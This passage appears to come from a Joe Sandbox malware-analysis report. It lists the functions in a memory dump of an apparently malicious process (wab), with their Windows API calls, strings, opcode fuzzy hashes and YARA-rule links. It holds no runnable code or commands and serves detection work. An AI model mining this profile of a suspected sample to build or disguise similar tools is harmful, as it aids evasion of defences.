                                                • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Temp$DirectoryFileNamePathWindows
                                                • String ID:
                                                • API String ID: 1125800050-0
                                                • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00415320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • failed memory resize %u to %u bytes, xrefs: 00415358
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: realloc
                                                • String ID: failed memory resize %u to %u bytes
                                                • API String ID: 471065373-2134078882
                                                • Opcode ID: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                • Instruction ID: af22f86c8d97814ed0bf188a45fefa7fc909daabc8cee38fca791e75313f3e85
                                                • Opcode Fuzzy Hash: e5ae129d454b891eada76ccbfa458d0a6592737a0e8831e28bd7d44ced5f0510
                                                • Instruction Fuzzy Hash: 49F027B3A01605A7D2109A55DC418CBF3DCDFC4655B06082FF998D3201E168E88083B6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: d
                                                • API String ID: 0-2564639436
                                                • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset
                                                • String ID: BINARY
                                                • API String ID: 2221118986-907554435
                                                • Opcode ID: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                • Opcode Fuzzy Hash: 423c094908dc07756a2ef734edd9c41c0411f3bff0f864234720e07ca5cd074c
                                                • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004104FB Relevance: 3.1, APIs: 2, Instructions: 140COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT ref: 0040EDC0
                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 00410654
                                                  • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??2@??3@ChangeCloseCreateErrorFileFindHandleLastMessageNotification_snwprintf
                                                • String ID:
                                                • API String ID: 1161345128-0
                                                • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: _wcsicmp
                                                • String ID: /stext
                                                • API String ID: 2081463915-3817206916
                                                • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                • FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$ByteCharMultiWide$??2@??3@ChangeCloseCreateFindNotificationReadSize
                                                • String ID:
                                                • API String ID: 159017214-0
                                                • Opcode ID: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                • Opcode Fuzzy Hash: 5551154f09d9ac0fe1cac7a20b9391cb02a4855cbb9d966ae120c46d578013b8
                                                • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00404423 Relevance: 3.1, APIs: 2, Instructions: 51libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                • String ID:
                                                • API String ID: 3150196962-0
                                                • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004152C6 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 27COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: malloc
                                                • String ID: failed to allocate %u bytes of memory
                                                • API String ID: 2803490479-1168259600
                                                • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040B1AB Relevance: 3.0, APIs: 2, Instructions: 14COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0041BC3B Relevance: 2.7, APIs: 2, Instructions: 195COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memcmpmemset
                                                • String ID:
                                                • API String ID: 1065087418-0
                                                • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00418C63 Relevance: 2.6, APIs: 2, Instructions: 132COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: memset
                                                • String ID:
                                                • API String ID: 2221118986-0
                                                • Opcode ID: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                • Instruction ID: 1d54aaebfbdefc3985b5f7374fea00c82d73a4224d5df9dcd637b0600b3a95b1
                                                • Opcode Fuzzy Hash: 1314b8a525b96e130b2fbb6cbe3c7ee378288528e928e0e3fe9c348834c14d1c
                                                • Instruction Fuzzy Hash: B2415872500701EFDB349F60E8848AAB7F5FB18314720492FE54AC7690EB38E9C58B98
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00403988 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                  • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                  • Part of subcall function 0040A02C: FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$Time$ChangeCloseCompareCreateFindNotificationmemset
                                                • String ID:
                                                • API String ID: 1481295809-0
                                                • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004135F7 Relevance: 1.5, APIs: 1, Instructions: 44libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                • String ID:
                                                • API String ID: 3150196962-0
                                                • Opcode ID: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                • Opcode Fuzzy Hash: 102e9bd218bff8034664a90f9159d5d227e7736aeb8d0cece17e8d9bf5f2cb6a
                                                • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004062A6 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: File$PointerRead
                                                • String ID:
                                                • API String ID: 3154509469-0
                                                • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                • String ID:
                                                • API String ID: 4232544981-0
                                                • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                  • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: AddressProc$FileModuleName
                                                • String ID:
                                                • API String ID: 3859505661-0
                                                • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                Download Yara Rule
                                                APIs
                                                • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040B633 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: ??3@
                                                • String ID:
                                                • API String ID: 613200358-0
                                                • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                Memory Dump Source
                                                • Source File: 00000010.00000002.2533014039.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                Memory Dump Source
